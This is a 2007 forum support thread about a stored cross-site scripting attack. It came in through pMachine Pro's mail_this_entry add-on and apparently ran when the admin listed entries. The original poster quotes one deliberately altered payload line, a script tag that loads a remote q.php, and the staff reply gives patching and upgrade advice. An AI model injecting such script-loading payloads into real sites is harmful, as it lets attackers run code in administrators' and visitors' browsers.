Part of the EllisLab Network
Forum Home  >  pMachine Pro Forums  >  pM Pro Technical Support  >  Thread
pMachine Pro has been replaced by ExpressionEngine, our full featured web publishing solution. Please consider upgrading.
You can download pMachine Pro here: Download pMachine Pro  |  Download Language Packs
   
 
mail_this_entry hack from site urkb.net
 
Kernon
Posted: 20 February 2007 07:06 PM   [ Ignore ]  
Lab Assistant
RankRank
Total Posts:  237
Joined  2002-11-13

Just FYI I ran into a problem using the mail_this_entry ad-on and a form I have on my site.  Someone was filling the form in with entries that looked like this (but changed so it won’t work):

script src=http://urkb.net/q.php>jonny6 [etc.]

When I went to do “Edit All Entries”, I assume that the display of the TITLE (etc.) caused this script to be executed, which then took control.  I really don’t know what it did before I closed down my browser.

In fact, if anyone has any notion of how to discover what the q.php program does without actually running it, I’d love to know!

In any event, I’m going to have fix the form that interfaces with mail_this_entry to prevent things like that from getting in.  For now, I was able to remove the offending entry by manually editing the MySQL database record.
Profile
 
 
Paul Burdick
Posted: 21 February 2007 03:02 PM   [ Ignore ]   [ # 1 ]  
Research Scientist
Avatar
RankRankRankRankRankRank
Total Posts:  7534
Joined  2002-08-05

First, make sure you are running the current version of pMachine Pro 2.4 as over two years ago there was a vulnerability found in the mail_this_entry add on.  Second, if you are allowing just anyone to submit entries to your site through that add on, then yes this is going to be a problem for you as anyone can submit any content they want to your site.  Third and finally, you really should upgrade to using EE Core, if you have a chance.  It has much more robust security and XSS attack protection.

 Signature 
Profile
 
 
Kernon
Posted: 22 February 2007 05:21 PM   [ Ignore ]   [ # 2 ]  
Lab Assistant
RankRank
Total Posts:  237
Joined  2002-11-13

Paul,

Thanks for your response.

I believe I saw the security fix for mail_this_entry and implemented it, but I will double check this.

Second, the submissions are not automatically displayed, but are entered as ‘closed’ so that I can review them.  What I was not aware of (until now), was that pMachine Pro mere act of displaying the list of entries would allow code to execute.  I guess you can say I was naïve, but I assumed that there was something in the system that stripped out such things.  I know that hyperlinks (and whatnot) were converted into pmcode (sp?) so I thought that something like this was being done.

Finally, I have actually paid for EE (you can check my account) but have not switched my site over to it due to extreme lack of time.  I’d love to be able to make the switch, but it is just not at all possible right now.

Thanks again!
Profile
 
 
   
 
 
‹‹ Stand-Alone Entry form File Upload Access Issues      Cannot make entries through CP ››
Post Marker Legend
New Topic New posts Hot Topic Hot Topic with new posts New Poll New Poll Moved Topic Moved Topic Sticky Topic Sticky topic
Old Topic No new posts Hot Old Topic Hot Topic with no new posts Old Poll Old Poll Closed Topic Closed Topic Announcement Announcements
Theme
Change Theme
Visitor Statistics
The most visitors ever was 233, on December 18, 2007 12:04 AM
Total Registered Members: 64433 Total Logged-in Users: 0
Total Topics: 80875 Total Anonymous Users: 0
Total Replies: 435350 Total Guests: 23
Total Posts: 516225    
Members ( View Memberlist )
Newest Members:  MizoBobbyBDan HessMateus SouzagiusiMolideverbeeldingnana2007soundsellerEdo Grandinetti
Active Members:   
Powered By ExpressionEngine
ExpressionEngine Discussion Forum - Version 2.1.1 (20081028)
Script Executed in 0.2942 seconds